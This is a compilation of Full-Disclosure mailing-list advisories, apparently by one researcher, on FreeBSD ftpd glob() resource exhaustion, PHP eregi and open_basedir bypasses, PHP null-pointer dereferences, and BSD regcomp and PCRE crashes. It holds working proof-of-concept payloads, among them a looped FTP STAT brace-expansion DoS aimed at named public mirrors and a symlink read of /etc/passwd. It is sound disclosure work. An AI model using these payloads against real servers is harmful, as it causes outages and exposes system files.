Re: [Full-disclosure] Allegro.pl XSS [0-day]
XSS isn't a critical issue. CVSS2 define a standard XSS ~4.3/10, more critical are CSRF ~6.8 or Open Redirect ~5.8. It's no sense public XSS in ONE website on this list! Too many websites are vulnerable. If someone have a nice XSS in software like phpmyadmin, it could be interesting. -- Best regards, Maksymilian Arciemowicz ( http://cifrex.org/ ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegro.pl XSS [0-day]
It's not a 0day. Allegro is not a software vendor. It's a website. -- Best regards, Maksymilian Arciemowicz ( http://cvemap.org/ ) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD 9.1 ftpd Remote Denial of Service
FreeBSD 9.1 ftpd Remote Denial of Service
Maksymilian Arciemowicz
http://cxsecurity.org/
http://cxsec.org/
Public Date: 01.02.2013
URL: http://cxsecurity.com/issue/WLB-2013020003
Affected servers:
- ftp.uk.freebsd.org,
- ftp.ua.freebsd.org,
- ftp5.freebsd.org,
- ftp5.us.freebsd.org,
- ftp10.freebsd.org,
- ftp3.uk.freebsd.org,
- ftp7.ua.freebsd.org,
- ftp2.se.freebsd.org,
- ftp2.za.FreeBSD.org,
- ftp2.ru.freebsd.org,
- ftp2.pl.freebsd.org
and more...
--- 1. Description ---
I have decided check BSD ftpd servers once again for wildcards. Old
bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last
FreeBSD version.
Attacker, what may connect anonymously to FTP server, may cause CPU
resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous',
sending 'STAT' command with special wildchar, enought to create ftpd
process with 100% CPU usage.
Proof of Concept (POC):
See the difference between NetBSD/libc and FreeBSD/libc.
--- PoC ---
#include
#include
int main(){
glob_t globbuf;
char
stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT,
NULL, &globbuf);
}
--- PoC ---
--- Exploit ---
user anonymous
pass anonymous
stat
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---
Result of attack:
ftp 13034 0.0 0.4 10416 1944 ?? R10:48PM0:00.96
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13035 0.0 0.4 10416 1944 ?? R10:48PM0:00.89
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13036 0.0 0.4 10416 1944 ?? R10:48PM0:00.73
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13046 0.0 0.4 10416 1952 ?? R10:48PM0:00.41
ftpd: cxsec.org anonymous/anonymous (ftpd)
ftp 13047 0.0 0.4 10416 1960 ?? R10:48PM0:00.42
ftpd: cxsec.org anonymous/anonymous (ftpd)
...
root13219 0.0 0.3 10032 1424 ?? R10:52PM0:00.00
/usr/libexec/ftpd -dDA
root13225 0.0 0.3 10032 1428 ?? R10:52PM0:00.00
/usr/libexec/ftpd -dDA
root13409 0.0 0.3 10032 1404 ?? R10:53PM0:00.00
/usr/libexec/ftpd -dDA
root13410 0.0 0.3 10032 1404 ?? R10:53PM0:00.00
/usr/libexec/ftpd -dDA
...
=>Sending:
STAT
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
=>Result:
@ps:
ftp 1336 100.0 0.5 10416 2360 ?? R11:15PM 600:39.95
ftpd: 127.0.0.1: anonymous/anonym...@cxsecurity.com: \r\n (ftpd)$
@top:
1336 root1 1030 10416K 2360K RUN600:53 100.00% ftpd
one request over 600m (~10h) execution time and 100% CPU usage. This
issue allow to create N ftpd processes with 100% CPU usage.
Just create loop while(1) and send these commands
---
user anonymous
pass anonymous
stat
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---
NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011)
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2
The funniest is that freebsd use GLOB_LIMIT in ftpd server.
http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
---
if (strpbrk(whichf, "~{[*?") != NULL) {
int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
freeglob = 1;
if (glob(whichf, flags, 0, &gl)) {
---
but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU
resource exhaustion. ;]
Libc was also vulnerable in Apple and Oracle products.
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
http://support.apple.com/kb/HT4723
only FreeBSD and GNU glibc are affected
--- 2. Exploit ---
http://cxsecurity.com/issue/WLB-2013010233
--- 3. Fix ---
Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve
problem with security ;)
--- 4. References ---
Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
http://cxsecurity.com/issue/WLB-2010100135
http:
[Full-disclosure] cIFrex: How to use Regular Expressions in Research
cIFrex is a small script written in PHP, which supports search for bugs in the analysis of the source code. Using the database of filters based on regular expressions, you can quickly locating the code, in which the probability of failure is high. You will just need to have the source code on a computer with the access to cIFrex in order to be able to fully benefit from the possibilities of the new methodology. Since 2010, cIFrex has been used in my private research. Creating new filters, I have discovered a lot of bugs like Resource Exhaustion in libc, apache or vsftpd. The problem with recursion was very easy to locate. In vsftpd and libc, the PoC contained '*' char. -fnmatch()/fnmatch.c-- /* Collapse multiple stars. */ while (c == '*') -fnmatch()/fnmatch.c-- and -vsf_filename_passes_filter()/ls.c-- /* Any incoming string left means no match unless we ended on the correct * type of wildcard. */ if (str_getlen(&name_remain_str) > 0 && last_token != '*') -vsf_filename_passes_filter()/ls.c-- Many stars have been used in the demonstration of PoC for apache and vsftpd. According to intuition, where is '*' char also is a recursion. Recursion in fnmatch() and vsf_filename_passes_filter(), can be described by: V1: (?:int |char |^)(?\w+)\(.* T1: (?:if|while).*\( to see all files, where '*' was used, use T2 pattern T2: .*\'\*\'.* in result, we retrieve a list of probably vulnerable files. But you need more luck and good intuition. Remember that cIFrex: - only helps to search for the bugs - the search results does not guarantee the appearance of the susceptibilities - the more exact the regular expression, the larger probability of the appearance of the susceptibilities cIFrex may be used to catch bugs not only in C language. Using filter like: V1: (.*echo.*\$_(?:POST|GET)\[(?:\'|\")(?\w+)(?:\'|\")\].*) F1: htmlspecialchars.* F2: \(int\)\$_(?:POST|GET)\[..\] we may catch a lot of Cross Site Scripting (CWE-79) vulnerabilities. Or SQL Injection (CWE-89) using: V1: \$(?\w+) \=.*\$_(?:GET|POST)\[(?.*)\] T1: mysql_query\(.*\$ F1: addslashes.*\$ List of filters cIFrex filters are based on regular expressions, describing given kind of mistake together with the CWE identifiers http://cxsecurity.com/cifrex/filters/ Download http://cxsecurity.com/cifrex/#download Download the latest stable version of the code: http://cxsecurity.com/cifrex_download/1.1/run.txt CWE Dictionary http://cxsecurity.com/allcwe/ CVE Full Map http://cxsecurity.com/cvemap/ More about project http://cxsecurity.com/cifrex/ http://cxsecurity.com/ -- Best Regards Maksymilian Arciemowicz (CXSecurity.com) pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 0xD6E5B530.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.4/5.3 deprecated eregi() memory_limit bypass
[ PHP 5.4/5.3 deprecated eregi() memory_limit bypass ]
Author: Maksymilian Arciemowicz
Website: http://cxsecurity.com/
Date: 30.03.2012
Original link:
http://cxsecurity.com/issue/WLB-2012030272
PoC's:
memory_limit poc
http://cxsecurity.com/issue/WLB-2012030271
open_basedir poc
http://cxsecurity.com/issue/WLB-2012030270
--- 1. PHP memory_limit bypass ---
Functions based on POSIX Regular Expression eg. eregi, are deprecated
since PHP 5.3. In last version 5.4.0 we may still use these functions.
It allow us to bypass memory_limit in PHP.
eregi() function based on POSIX regexp, otherwise preg_match() based on
PCRE. This is the main difference between these functions.
POSIX Regex Functions Tutrial
http://lu.php.net/manual/en/ref.regex.php
PCRE Functions Tutrial
http://lu.php.net/manual/en/ref.pcre.php
In last year, we have published a fix for regcomp()/libc function from
NetBSD source. eregi() use the same source code what in libc of netbsd.
In result, we may exhaustion memory limit or stack in PHP
See our security note:
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102
Script presented below, show how to use eregi() to exhaustion memory in PHP
- http://cxsecurity.com/issue/WLB-2012030271 --
http://cxsecurity.com/
cxib [ a.T] cxsecurity [ d0t] com
To show memory_limit in PHP
# php /www/memlimpoc.php 1 3500
PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried
to allocate 3501 bytes) in /var/www/memlimpoc.php on line 12
Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to
allocate 3501 bytes) in /var/www/memlimpoc.php on line 12
and try this
# php /www/memlimpoc.php 2
memory_limit bypassed
*/
ini_set("memory_limit","32M");
if($argv[1]==1)
$sss=str_repeat("A",$argv[2]);
elseif($argv[1]==2)
eregi("(.?)(((.*){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}){1,2}","a");
?>
- http://cxsecurity.com/issue/WLB-2012030271 --
Remember. Don't use memory_limit as a main memory limiter.
--- 2. PHP open_basedir bypass ---
PHP latest version, 5.4.0 brought many changes. safe_mode has been
removed but open_basedir is still available for use. We don't need look
for new ways to bypass open_basedir. The problem with symlinks is still
available in PHP.
safe_mode tutrial
http://php.net/manual/en/features.safe-mode.php
PoC:
127# cat sym.php
127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www)
in /www/test/sym.php on line 2
Warning: symlink(): open_basedir restriction in effect.
File(/etc/passwd) is not within the allowed path(s): (/www) in
/www/test/sym.php on line 2
127#
open_basedir will disallow /etc/passwd.
Let`s see:
127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
-rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
-rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...
now "tmplink" is a directory. so link "exploit" will be
"../../etc/passwd". We don't need bypass open_basedir, it is a design
mistake. PHP will allow "tmplink/../../../etc/passwd" because
./tmplink/../../../etc/passwd really exists.
PoC:
http://cxsecurity.com/issue/WLB-2012030270
Remember. Don't use open_basedir as a main security feature.
--- 3. References ---
Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
http://cxsecurity.com/research/102
memory_limit bypass poc
http://cxsecurity.com/issue/WLB-2012030271
PHP 5.2.11/5.3.0 Multiple Vulnerabilities
http://cxsecurity.com/research/70
open_basedir bypass poc
http://cxs
[Full-disclosure] PHP 5.3.8 Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.3.8 Multiple vulnerabilities ]
Author: Maksymilian Arciemowicz
Website: http://cxsecurity.com/
Date: 14.01.2012
CVE:
CVE-2011-4153 (zend_strndup)
Original link:
http://cxsecurity.com/research/103
[--- 1. Multiple NULL Pointer Dereference with zend_strndup()
[CVE-2011-4153] ---]
As we can see in zend_strndup()
- -zend_alloca.c---
ZEND_API char *zend_strndup(const char *s, uint length)
{
char *p;
p = (char *) malloc(length+1);
if (UNEXPECTED(p == NULL)) {
return p; <=== RETURN NULL
}
if (length) {
memcpy(p, s, length);
}
p[length] = 0;
return p;
}
- -zend_alloca.c---
zend_strndup() may return NULL
in php code, many calls to zend_strndup() dosen't checks returned
values. In result, places like:
- -zend_builtin_functions.c---
ZEND_FUNCTION(define)
{
char *name;
int name_len;
zval *val;
zval *val_free = NULL;
zend_bool non_cs = 0;
int case_sensitive = CONST_CS;
zend_constant c;
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sz|b", &name,
&name_len, &val, &non_cs) == FAILURE) {
return;
}
...
c.flags = case_sensitive; /* non persistent */
c.name = zend_strndup(name, name_len); < MAY RETURN NULL
c.name_len = name_len+1;
c.module_number = PHP_USER_CONSTANT;
if (zend_register_constant(&c TSRMLS_CC) == SUCCESS) {
RETURN_TRUE;
} else {
RETURN_FALSE;
}
}
- -zend_builtin_functions.c---
- -PoC code---
[cx@82 /www]$ ulimit -a
socket buffer size (bytes, -b) unlimited
core file size (blocks, -c) unlimited
data seg size (kbytes, -d) 524288
file size (blocks, -f) unlimited
max locked memory (kbytes, -l) unlimited
max memory size (kbytes, -m) 4
open files (-n) 11095
pipe size(512 bytes, -p) 1
stack size (kbytes, -s) 65536
cpu time (seconds, -t) unlimited
max user processes (-u) 5547
virtual memory (kbytes, -v) 4
swap size (kbytes, -w) unlimited
[cx@82 /www]$ cat define.php
- -PoC code---
to see difference
[cx@82 /www]$ php define.php 899
Out of memory
[cx@82 /www]$ php define.php 999
Segmentation fault: 11
(gdb) bt
#0 0x28745eb0 in strrchr () from /lib/libc.so.7
#1 0x0822d538 in zend_register_constant (c=0xbfbfcfb0)
at /usr/ports/lang/php5/work/php/Zend/zend_constants.c:429
#2 0x08251e0e in zif_define (ht=2, return_value=0x28825a98,
return_value_ptr=0x0, this_ptr=0x0, return_value_used=0)
at /usr/ports/lang/php5/work/php/Zend/zend_builtin_functions.c:688
#3 0x0826dba6 in zend_do_fcall_common_helper_SPEC
(execute_data=0x29401040)
at zend_vm_execute.h:316
There are others places, where zend_strndup() is used:
- -1--
ext/soap/php_sdl.c
if (sdl->is_persistent) {
new_enc->details.ns = zend_strndup(ns, ns_len);
new_enc->details.type_str =
strdup(new_enc->details.type_str);
} else {
new_enc->details.ns = estrndup(ns, ns_len);
new_enc->details.type_str =
estrdup(new_enc->details.type_str);
}
- -1--
- -2--
ext/standard/syslog.c
BG(syslog_device) = zend_strndup(ident, ident_len);
openlog(BG(syslog_device), option, facility);
RETURN_TRUE;
- -2--
- -3--
ext/standard/browscap.c
} else { /* Other than true/false setting */
Z_STRVAL_P(new_property) =
zend_strndup(Z_STRVAL_P(arg2),
Z_STRLEN_P(arg2));
Z_STRLEN_P(new_property) =
Z_STRLEN_P(arg2);
}
new_key = zend_strndup(Z_STRVAL_P(arg1),
Z_STRLEN_P(arg1));
zend_str_tolower(new_key, Z_STRLEN_P(arg1));
zend_hash_update(Z_ARRVAL_P(current_section),
new_key,
Z_STRLEN_P(arg1) + 1, &new_property, sizeof(zval *), NULL);
free(new_key);
- -3--
- -4--
ext/oci8/oci8.c
if (alloc_non_persistent) {
connection = (php_oci_connection *) ecalloc(1,
sizeof(php_oci_connection));
connection->hash_key = estrndup(hashed_details.c,
hashed_details.len);
connection->is_persistent = 0;
} else {
connection = (php_oci_connection *) calloc(1,
sizeof(php_oci_connection));
connection->hash_key = zend_strndup(hashed_details.c,
hashed_details.len);
[Full-disclosure] Multiple BSD libc/regcomp(3) Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Multiple BSD libc/regcomp(3) Multiple Vulnerabilities ]
Author: Maksymilian Arciemowicz
http://www.netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 05.10.2011
- - Pub.: 04.11.2011
CVE: CVE-2011-3336
Affected Software:
- - NetBSD 5.1 (fixed)
- - OpenBSD 5.0
- - FreeBSD 8.2
- - MacOSX
Original URL:
http://securityreason.com/achievement_securityalert/102
- --- 0.Description ---
regcomp() compiles the regular expression contained in the pattern
string, subject to the flags in cflags, and places the results in the
regex_t structure pointed to by preg.
cflags is the bitwise OR of zero or more of the following flags:
REG_EXTENDED
Compile modern (extended) REs, rather than the obsolete (basic) REs that
are the default.
REG_BASIC
This is a synonym for 0, provided as a counterpart to REG_EXTENDED to
improve readability.
- --- 1. Multiple BSD libc/regcomp(3) Multiple Vulnerabilities ---
In regcomp(3) of BSD implementation, i've discovered a several flaws.
Similar problem was diagnosed one year ago in GNU libc (01.10.2010). But
GNU regcomp() code is different from BSD.
Recursion and bad memory managment, may admit to unexpected end of
application. Together with NetBSD we have decided to fix all these
flaws. Most important was limit of recursion for REG_EXTENDED and
REG_BASIC, and get better control over memory usage.
Specifically crafted .ftpaccess file can return result as below
- -proftpd---
# telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 ProFTPD 1.3.3f Server (ProFTPD Default Installation) [127.0.0.1]
user dude
331 Password required for dude
pass dude
and in the same time
# gdb -q proftpd 15814
(no debugging symbols found)
Attaching to program: /usr/local/sbin/proftpd, process 15814
Reading symbols from /usr/lib/libutil.so.11.2...done.
Loaded symbols for /usr/lib/libutil.so.11.2
Reading symbols from /usr/lib/libc.so.58.0...done.
Loaded symbols for /usr/lib/libc.so.58.0
Reading symbols from /usr/libexec/ld.so...done.
Loaded symbols for /usr/libexec/ld.so
0x001f39e9 in select () from /usr/lib/libc.so.58.0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x0026d951 in memcpy () from /usr/lib/libc.so.58.0
crash in regcomp()
...
assert(finish >= start);
if (len == 0)
return(ret);
enlarge(p, p->ssize + len); /* this many unexpected additions */
assert(p->ssize >= p->slen + len);
(void)memcpy(p->strip + p->slen, p->strip + start,
(size_t)len * sizeof(sop));
...
(gdb) x/i $eip
0x2d42951 : repz movsl %ds:(%esi),%es:(%edi)
...
- -proftpd---
Uncontrolled memory exhaustion, allow to create an RE consuming all free
memory. As we can read in manual:
- -man regcomp 3--
regexec() performance is poor. This will improve with later releases.
nmatch exceeding 0 is expensive; nmatch exceeding 1 is worse.
regexec is largely insensitive to RE complexity except that back
references are massively expensive. RE length does matter; in
particular, there is a strong speed bonus for keeping RE length under
about 30 characters, with most special characters counting roughly double.
regcomp() implements bounded repetitions by macro expansion, which is
costly in time and space if counts are large or bounded repetitions are
nested. An RE like, say, `a{1,100}){1,100}){1,100}){1,100}){1,100}'
will (eventually) run almost any existing machine out of swap space.
- -man regcomp 3--
Using RE like `a{1,100}){1,100}){1,100}){1,100}){1,100}' may lead to
out of swap space. It can be helpful to attack last stable version of
proftpd.
To fix memory exhaustion problem, we should create some limit of memory
usage. In my opinion 128MB is optimal limit for one regcomp(3) call.
Then function, checking memory usage like below
- -part-of-fix--
214: #defineMEMLIMIT0x800
215: #define MEMSIZE(p) \
216:((p)->ncsalloc / CHAR_BIT * (p)->g->csetsize + \
217:(p)->ncsalloc * sizeof(cset) + \
218:(p)->ssize * sizeof(sop))
219: #defineRECLIMIT256
- -part-of-fix--
should solve problem with memory exhaustion.
In regcomp() we have a few recursion loops:
- - p_ere <> p_ere_exp
- - p_bre <> p_bre_exp
- - repeat
We need to create a limit for the two main functions p_ere and p_bre_exp
#define RECLIMIT256
- -REG_EXTENTED---
341: p_ere(
342: struct parse *p,
343: int stop, /* character this ERE should end at */
344: size_t reclimit)
345: {
...
351:
352:_DIAGASSERT(p != NULL);
353:
354:if (reclimit++ > RECLIMIT || p->error == REG_ESPACE) {
355:p->error = REG_ESPACE;
356:return;
357:}
358:
359:for (;;) {
360:/* do a bunch of concatenated expressions */
361:
Re: [Full-disclosure] New Opera 11.51 PoC Denial of Service (pigtail23)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
stack exhaustion. it's seems to recursion problem for basic regular
expression. the same or similar problem exists in PCRE 8.12, allowing to
crash multiple applications
cx@cx64:/www$ cat crash0.php
cx@cx64:/www$ php crash0.php
Segmentation fault
or some times ago for apache,
127# cat .htaccess
RewriteEngine On
RewriteBase /rcrash
RewriteRule gun((.*){2000,}(\s*){2000,}.*) /ygy
127# curl http://127.0.0.1/rcrash/gun
curl: (52) Empty reply from server
[Mon Jul 11 02:40:39 2011] [notice] child pid 1343 exit signal Illegal
instruction (4)
Program received signal SIGSEGV, Segmentation fault.
0x08097a9b in match (eptr=0xbb777b07 "", ecode=0xbb76ab6f "*\bB",
offset_top=8, md=0xbfbfe284, ims=0, eptrb=0xbfa02014, flags=2)
at pcre.c:7997
7997c = *ecode++ - OP_TYPESTAR;
that is the same problem.
- --
Best Regards
pub 4096R/D6E5B530 2010-09-19
uid Maksymilian Arciemowicz (cx)
sub 4096R/58BA663C 2010-09-19
-BEGIN PGP SIGNATURE-
iQIcBAEBAgAGBQJOo1mUAAoJEIO8+dzW5bUwMBwP/3M0LD5DaXzuwvT3jhmuxi+m
aQ8/66efeFAYqcm8XFTx4xcinA6thDvxV05VHUN1TwJbBUY/m0IatD5WdD3gCY2/
R61fg3zmYZoKg5+aeSCJT3VSJbhQbA8pcQoDQp8BI+AdLv9D1hGu6n8qMC9xF6Lx
4ef/sqTZfsGZObKU1ualRvKa5MWT9N78r8ufDDwxEnDnk6IigrKnnRfsnQsZbboW
i1hGwyJhDNI0s9HJzyT2t0sru3aGdSXXVoKlSkmtfVbhvpmT8gyIWr3xNJZQWXRP
odGNXPJ4/+yKXZh5jjNZ4tFqc4ARkkpG5WxqoLOwVYucTQgcJeh61gt42cMnAnFM
NNKYjhFS1IKiuW8UXWPDB6hoVySBsOArhZK7d6P/h3PsMNGVm1lixfQMX5e1JNQb
5KUu704p1ONDyzC5JWqfdGYwXE3K10sDZJ6K7n0vgEtmfGVX3WKjIybnAlnZ5CT/
7MCo4xGKB7vuMUeZaBInKvLwr/a1LZK1MFMPcu+ypNBLJI6FWG98OsNttpRz2jRz
O0dq0BNAGZR8zTYnd6JD7zTKpk9IIHoQLJjDjTDsxZrOFnLrF6FTqCwUSuTo9ldi
r+T3GU0+dtBTUG34mBPxWSYlGUag6xjLlyOZDpSniSSwj8brsCKuXlOf67Hh2VHW
MfKU/5PxCy6TYZjdAROB
=L6P1
-END PGP SIGNATURE-
0xD6E5B530.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symlink vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 10/22/2011 11:14 AM, full-disclosure-requ...@lists.grok.org.uk wrote: > If you had your way, would you see it implemented as /tmp/ > //tmp, or some other way? per_user_tmp=yes ? http://www.feyrer.de/NetBSD/bx/blosxom.cgi/index.front?-tags=tmp - -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJOouW2AAoJEIO8+dzW5bUwz5IP/2zd8n7txMETl/t1wHvvhnXV YhyfSCSxxnYXh7Us9T/5aLFZUBykwOV03Dr9p57G7S25ETtYwPXGdcNlnhIQ8La5 7Ac3g8htqoPvX8pVKx0ZcEz2CVZwOtR32AvSkY+ulFx3q1eZC22BHj/vQ3QFa2ky AFHC/9B5l5tcyJUyAqGRYqrvP4ijhjew6aHS6A1WTlwEDNkA4hj8eKxHW7J1o3iR 14buqi2/mAN2XwYus3DniQI7LTsAp20nv60yFMuTIBZ24kzDc/XGkNw5sNzkJOnq Q6Cg4rxhLclwH91aSyrZOsrBE1irWsAQM40yMzuZ1UnlcQJv3dVln8OdnFSEpoUN DWR1iyeYOHW5tHhW9f9elj8CZQQJG/iGyfaYItGWWx0R5sHyRXfK0Dqk7V7c+Fqw 8LVj33xCwmD2ihYLWKoOWHNe1jpaZV+m9miVnNH6pAHvBspXVva5dwyidhxOgyvu e67VuHdMlpMi9HN/j+ULsjrJ92GpWwNZBVi54UxaPnUnIzA+UEyDvXRikdDNVWaK BXU+6T8uvncctv/k2ujrVJrTFEByxcWKXSUXvpVB1d3hfcJShUWyaXqKBIDYmNoL jjMhlM17D2wdIw/h0NvCopTXC+xExZAjZT423xpyhkrw8TzUN2imfd1eEYLDs/RT yN2Gr0CCVYY3J6SH0D/r =6G5i -END PGP SIGNATURE- 0xD6E5B530.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.3.6 multiple null pointer dereference
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.3.6 multiple null pointer dereference ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://securityreason.net/
http://cxib.net/
Date:
- - Dis.: 20.07.2011
- - Pub.: 19.08.2011
Affected Software (verified):
PHP 5.3.6 and prior
Fixed:
PHP 5.3.7
Original URL:
http://securityreason.com/achievement_securityalert/101
- --- 0.Description ---
PHP is a general-purpose scripting language originally designed for web
development to produce dynamic web pages. For this purpose, PHP code is
embedded into the HTML source document and interpreted by a web server
with a PHP processor module, which generates the web page document. It
also has evolved to include a command-line interface capability and can
be used in standalone graphical applications.
- --- 1. PHP 5.3.6 multiple null pointer dereference ---
Some time ago we have reported list with possible NULL pointer
dereferences in php 5.3.6. If user may change size of malloc, it's
possible to get NULL pointer dereferences. I haven't enought time to
check security impacts for all these bugs.
To demonstrate these flaws, we may use default memory limit in OpenBSD
[512MB]. We should allocate a lot of memory like 510MB (still 2MB free).
If some string is longer than 2MB (example 4MB), and php try copy this
string using malloc/strlen etc then malloc return NULL. Then program is
counting with possible NULL pointer dereference or buffer overflow
sympthons.
Example:
http://cwe.mitre.org/data/definitions/690.html
where CWE-690 give CWE-476 NULL pointer dereference
good example for CWE-690 is
tz->location.comments = malloc(comments_len + 1);
memcpy(tz->location.comments, *tzf, comments_len);
This code may provide to null pointer dereference or simple crash with
nulling memory with memset()
in.str = malloc((e - s) + YYMAXFILL);
memset(in.str, 0, (e - s) + YYMAXFILL);
memcpy(in.str, s, (e - s));
Program received signal SIGSEGV, Segmentation fault.
0xbba7581c in memset () from /usr/lib/libc.so.12
(gdb) x/i $eip
0xbba7581c : rep stos %eax,%es:(%edi)
(gdb) x/x $eax
0x0:Cannot access memory at address 0x0
(gdb) x/x $edi
0x0:Cannot access memory at address 0x0
In this case, memset() overwrite the memory with 0x0 char. If attacker
